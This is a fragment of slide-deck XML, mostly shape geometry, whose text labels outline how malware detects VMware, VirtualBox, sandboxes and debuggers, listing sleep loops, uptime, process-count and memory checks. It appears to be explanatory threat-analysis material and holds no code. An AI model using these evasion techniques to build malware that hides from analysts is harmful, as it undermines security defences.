                  <a:pt x="6413498" y="476250"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="31752" y="476250"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="14216" y="476250"/>
                  <a:pt x="0" y="462034"/>
                  <a:pt x="0" y="444498"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="31752"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="14216"/>
                  <a:pt x="14216" y="0"/>
                  <a:pt x="31752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Shape 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1095375" y="366712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5875" y="7938"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="7119" y="7938"/>
                  <a:pt x="0" y="15056"/>
                  <a:pt x="0" y="23812"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="87313"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="96069"/>
                  <a:pt x="7119" y="103188"/>
                  <a:pt x="15875" y="103188"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="51594" y="103188"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="47625" y="115094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29766" y="115094"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="26467" y="115094"/>
                  <a:pt x="23812" y="117748"/>
                  <a:pt x="23812" y="121047"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="23812" y="124346"/>
                  <a:pt x="26467" y="127000"/>
                  <a:pt x="29766" y="127000"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="97234" y="127000"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="100533" y="127000"/>
                  <a:pt x="103188" y="124346"/>
                  <a:pt x="103188" y="121047"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="103188" y="117748"/>
                  <a:pt x="100533" y="115094"/>
                  <a:pt x="97234" y="115094"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="79375" y="115094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="75406" y="103188"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="111125" y="103188"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="119881" y="103188"/>
                  <a:pt x="127000" y="96069"/>
                  <a:pt x="127000" y="87313"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="127000" y="23812"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="127000" y="15056"/>
                  <a:pt x="119881" y="7938"/>
                  <a:pt x="111125" y="7938"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="15875" y="7938"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="23812" y="23812"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="103188" y="23812"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="107578" y="23812"/>
                  <a:pt x="111125" y="27360"/>
                  <a:pt x="111125" y="31750"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="111125" y="71438"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="111125" y="75828"/>
                  <a:pt x="107578" y="79375"/>
                  <a:pt x="103188" y="79375"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="23812" y="79375"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="19422" y="79375"/>
                  <a:pt x="15875" y="75828"/>
                  <a:pt x="15875" y="71438"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="15875" y="31750"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="15875" y="27360"/>
                  <a:pt x="19422" y="23812"/>
                  <a:pt x="23812" y="23812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5" name="Text 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1301750" y="3556000"/>
            <a:ext cx="183356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VMware Detection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301750" y="3746500"/>
            <a:ext cx="1825625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Checks for VMware-specific artifacts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1016000" y="4032250"/>
            <a:ext cx="6445250" cy="476250"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6445250" h="476250">
                <a:moveTo>
                  <a:pt x="31752" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6413498" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6431034" y="0"/>
                  <a:pt x="6445250" y="14216"/>
                  <a:pt x="6445250" y="31752"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="6445250" y="444498"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6445250" y="462034"/>
                  <a:pt x="6431034" y="476250"/>
                  <a:pt x="6413498" y="476250"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="31752" y="476250"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="14216" y="476250"/>
                  <a:pt x="0" y="462034"/>
                  <a:pt x="0" y="444498"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="31752"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="14216"/>
                  <a:pt x="14216" y="0"/>
                  <a:pt x="31752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8" name="Shape 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1095375" y="4206875"/>
            <a:ext cx="127000" cy="127000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="127000" h="127000">
                <a:moveTo>
                  <a:pt x="15875" y="7938"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="7119" y="7938"/>
                  <a:pt x="0" y="15056"/>
                  <a:pt x="0" y="23812"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="87313"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="96069"/>
                  <a:pt x="7119" y="103188"/>
                  <a:pt x="15875" y="103188"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="51594" y="103188"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="47625" y="115094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29766" y="115094"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="26467" y="115094"/>
                  <a:pt x="23812" y="117748"/>
                  <a:pt x="23812" y="121047"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="23812" y="124346"/>
                  <a:pt x="26467" y="127000"/>
                  <a:pt x="29766" y="127000"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="97234" y="127000"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="100533" y="127000"/>
                  <a:pt x="103188" y="124346"/>
                  <a:pt x="103188" y="121047"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="103188" y="117748"/>
                  <a:pt x="100533" y="115094"/>
                  <a:pt x="97234" y="115094"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="79375" y="115094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="75406" y="103188"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="111125" y="103188"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="119881" y="103188"/>
                  <a:pt x="127000" y="96069"/>
                  <a:pt x="127000" y="87313"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="127000" y="23812"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="127000" y="15056"/>
                  <a:pt x="119881" y="7938"/>
                  <a:pt x="111125" y="7938"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="15875" y="7938"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="23812" y="23812"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="103188" y="23812"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="107578" y="23812"/>
                  <a:pt x="111125" y="27360"/>
                  <a:pt x="111125" y="31750"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="111125" y="71438"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="111125" y="75828"/>
                  <a:pt x="107578" y="79375"/>
                  <a:pt x="103188" y="79375"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="23812" y="79375"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="19422" y="79375"/>
                  <a:pt x="15875" y="75828"/>
                  <a:pt x="15875" y="71438"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="15875" y="31750"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="15875" y="27360"/>
                  <a:pt x="19422" y="23812"/>
                  <a:pt x="23812" y="23812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9" name="Text 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1301750" y="4095750"/>
            <a:ext cx="1651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VirtualBox Detection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301750" y="4286250"/>
            <a:ext cx="164306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Identifies VirtualBox registry keys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016000" y="4603750"/>
            <a:ext cx="6508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Malware queries hardware info and BIOS data to detect virtualized environments, altering behavior to evade analysis.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762875" y="1365250"/>
            <a:ext cx="4111625" cy="2413000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4111625" h="2413000">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4111625" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4111625" y="2413000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="241300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Shape 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7762875" y="1365250"/>
            <a:ext cx="31750" cy="2413000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="31750" h="2413000">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="31750" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="31750" y="2413000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2413000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4" name="Shape 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7937500" y="1524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1749" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="349251" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="366786" y="0"/>
                  <a:pt x="381000" y="14214"/>
                  <a:pt x="381000" y="31749"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="381000" y="349251"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="381000" y="366786"/>
                  <a:pt x="366786" y="381000"/>
                  <a:pt x="349251" y="381000"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="31749" y="381000"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="14214" y="381000"/>
                  <a:pt x="0" y="366786"/>
                  <a:pt x="0" y="349251"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="31749"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="14226"/>
                  <a:pt x="14226" y="0"/>
                  <a:pt x="31749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5" name="Shape 33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8032750" y="16192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Text 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8445500" y="1524000"/>
            <a:ext cx="334962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Sandbox Evasion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445500" y="1809750"/>
            <a:ext cx="3270250" cy="1333500"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3270250" h="1333500">
                <a:moveTo>
                  <a:pt x="31751" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3238499" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3256035" y="0"/>
                  <a:pt x="3270250" y="14215"/>
                  <a:pt x="3270250" y="31751"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3270250" y="1301749"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3270250" y="1319285"/>
                  <a:pt x="3256035" y="1333500"/>
                  <a:pt x="3238499" y="1333500"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="31751" y="1333500"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="14215" y="1333500"/>
                  <a:pt x="0" y="1319285"/>
                  <a:pt x="0" y="1301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8" name="Text 36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8540750" y="1905000"/>
            <a:ext cx="3135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Common Evasion Techniques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8540750" y="2127250"/>
            <a:ext cx="3135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Delayed execution (sleep loops)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540750" y="2317750"/>
            <a:ext cx="3135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User interaction requirements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540750" y="2508250"/>
            <a:ext cx="3135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System uptime verification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540750" y="2698750"/>
            <a:ext cx="3135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Process count analysis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8540750" y="2889250"/>
            <a:ext cx="3135313" cy="1587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875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• Available memory checks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8445500" y="3238500"/>
            <a:ext cx="33337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Sandboxes have limited resources. Malware can detect this and refuse to execute malicious payloads.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750175" y="3908425"/>
            <a:ext cx="4117975" cy="3673475"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4117975" h="3673475">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4117975" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4117975" y="3673475"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3673475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10196"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="10160">
            <a:solidFill>
              <a:srgbClr val="E0A45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46" name="Shape 44"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7900194" y="4070348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2089" y="1612"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="76708" y="-527"/>
                  <a:pt x="82042" y="-527"/>
                  <a:pt x="86661" y="1612"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="154440" y="32928"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="157076" y="34137"/>
                  <a:pt x="158750" y="36773"/>
                  <a:pt x="158750" y="39688"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="158750" y="42602"/>
                  <a:pt x="157076" y="45238"/>
                  <a:pt x="154440" y="46447"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="86661" y="77763"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="82042" y="79902"/>
                  <a:pt x="76708" y="79902"/>
                  <a:pt x="72089" y="77763"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4310" y="46447"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1674" y="45207"/>
                  <a:pt x="0" y="42571"/>
                  <a:pt x="0" y="39688"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="36804"/>
                  <a:pt x="1674" y="34137"/>
                  <a:pt x="4310" y="32928"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="72089" y="1612"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="14914" y="67717"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="65856" y="91250"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="74445" y="95219"/>
                  <a:pt x="84336" y="95219"/>
                  <a:pt x="92925" y="91250"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="143867" y="67717"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="154440" y="72616"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="157076" y="73825"/>
                  <a:pt x="158750" y="76460"/>
                  <a:pt x="158750" y="79375"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="158750" y="82290"/>
                  <a:pt x="157076" y="84925"/>
                  <a:pt x="154440" y="86134"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="86661" y="117450"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="82042" y="119590"/>
                  <a:pt x="76708" y="119590"/>
                  <a:pt x="72089" y="117450"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4310" y="86134"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1674" y="84894"/>
                  <a:pt x="0" y="82259"/>
                  <a:pt x="0" y="79375"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="76491"/>
                  <a:pt x="1674" y="73825"/>
                  <a:pt x="4310" y="72616"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="14883" y="67717"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4310" y="112303"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="14883" y="107404"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="65825" y="130938"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="74414" y="134906"/>
                  <a:pt x="84305" y="134906"/>
                  <a:pt x="92894" y="130938"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="143836" y="107404"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="154409" y="112303"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="157045" y="113512"/>
                  <a:pt x="158719" y="116148"/>
                  <a:pt x="158719" y="119062"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="158719" y="121977"/>
                  <a:pt x="157045" y="124613"/>
                  <a:pt x="154409" y="125822"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="86630" y="157138"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="82010" y="159277"/>
                  <a:pt x="76677" y="159277"/>
                  <a:pt x="72058" y="157138"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4310" y="125822"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1674" y="124582"/>
                  <a:pt x="0" y="121946"/>
                  <a:pt x="0" y="119062"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="116179"/>
                  <a:pt x="1674" y="113512"/>
                  <a:pt x="4310" y="11230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7" name="Text 45"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8078787" y="4038598"/>
            <a:ext cx="3738563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250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Evasion Technique Layers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880350" y="4356098"/>
            <a:ext cx="3857625" cy="444500"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3857625" h="444500">
                <a:moveTo>
                  <a:pt x="31751" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3825874" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3843410" y="0"/>
                  <a:pt x="3857625" y="14215"/>
                  <a:pt x="3857625" y="31751"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3857625" y="412749"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3857625" y="430285"/>
                  <a:pt x="3843410" y="444500"/>
                  <a:pt x="3825874" y="444500"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="31751" y="444500"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="14215" y="444500"/>
                  <a:pt x="0" y="430285"/>
                  <a:pt x="0" y="412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9" name="Shape 47"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7975600" y="4451348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0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="222250" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="239773" y="0"/>
                  <a:pt x="254000" y="14227"/>
                  <a:pt x="254000" y="31750"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="254000" y="222250"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="254000" y="239773"/>
                  <a:pt x="239773" y="254000"/>
                  <a:pt x="222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0" name="Text 48"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7943850" y="4451348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1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8324850" y="4483098"/>
            <a:ext cx="144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Basic debugger detection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880350" y="4864098"/>
            <a:ext cx="3857625" cy="444500"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3857625" h="444500">
                <a:moveTo>
                  <a:pt x="31751" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3825874" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3843410" y="0"/>
                  <a:pt x="3857625" y="14215"/>
                  <a:pt x="3857625" y="31751"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3857625" y="412749"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3857625" y="430285"/>
                  <a:pt x="3843410" y="444500"/>
                  <a:pt x="3825874" y="444500"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="31751" y="444500"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="14215" y="444500"/>
                  <a:pt x="0" y="430285"/>
                  <a:pt x="0" y="412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3" name="Shape 51"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7975600" y="4959348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0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="222250" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="239773" y="0"/>
                  <a:pt x="254000" y="14227"/>
                  <a:pt x="254000" y="31750"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="254000" y="222250"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="254000" y="239773"/>
                  <a:pt x="239773" y="254000"/>
                  <a:pt x="222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4" name="Text 52"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7943850" y="4959348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2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324850" y="4991098"/>
            <a:ext cx="14446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VM environment analysis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880350" y="5372098"/>
            <a:ext cx="3857625" cy="444500"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3857625" h="444500">
                <a:moveTo>
                  <a:pt x="31751" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3825874" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3843410" y="0"/>
                  <a:pt x="3857625" y="14215"/>
                  <a:pt x="3857625" y="31751"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3857625" y="412749"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3857625" y="430285"/>
                  <a:pt x="3843410" y="444500"/>
                  <a:pt x="3825874" y="444500"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="31751" y="444500"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="14215" y="444500"/>
                  <a:pt x="0" y="430285"/>
                  <a:pt x="0" y="412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7" name="Shape 55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7975600" y="5467348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0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="222250" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="239773" y="0"/>
                  <a:pt x="254000" y="14227"/>
                  <a:pt x="254000" y="31750"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="254000" y="222250"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="254000" y="239773"/>
                  <a:pt x="239773" y="254000"/>
                  <a:pt x="222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8" name="Text 56"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7943850" y="5467348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324850" y="5499098"/>
            <a:ext cx="1524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Sandbox behavior analysis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880350" y="5880098"/>
            <a:ext cx="3857625" cy="444500"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3857625" h="444500">
                <a:moveTo>
                  <a:pt x="31751" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3825874" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3843410" y="0"/>
                  <a:pt x="3857625" y="14215"/>
                  <a:pt x="3857625" y="31751"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3857625" y="412749"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3857625" y="430285"/>
                  <a:pt x="3843410" y="444500"/>
                  <a:pt x="3825874" y="444500"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="31751" y="444500"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="14215" y="444500"/>
                  <a:pt x="0" y="430285"/>
                  <a:pt x="0" y="412749"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="31751"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="14227"/>
                  <a:pt x="14227" y="0"/>
                  <a:pt x="31751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1" name="Shape 59"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7975600" y="5975348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31750" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="222250" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="239773" y="0"/>
                  <a:pt x="254000" y="14227"/>
                  <a:pt x="254000" y="31750"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="254000" y="222250"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="254000" y="239773"/>
                  <a:pt x="239773" y="254000"/>
                  <a:pt x="222250" y="254000"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="31750" y="254000"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="14227" y="254000"/>
                  <a:pt x="0" y="239773"/>
                  <a:pt x="0" y="222250"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="31750"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="14227"/>
                  <a:pt x="14227" y="0"/>
                  <a:pt x="31750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2" name="Text 60"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7943850" y="5975348"/>
            <a:ext cx="31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000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8324850" y="6007098"/>
            <a:ext cx="1420813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Timing attack prevention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333375" y="7677152"/>
            <a:ext cx="11541125" cy="635000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="11541125" h="635000">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11541125" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11541125" y="635000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="635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5" name="Shape 63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="333375" y="7677152"/>
            <a:ext cx="31750" cy="635000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
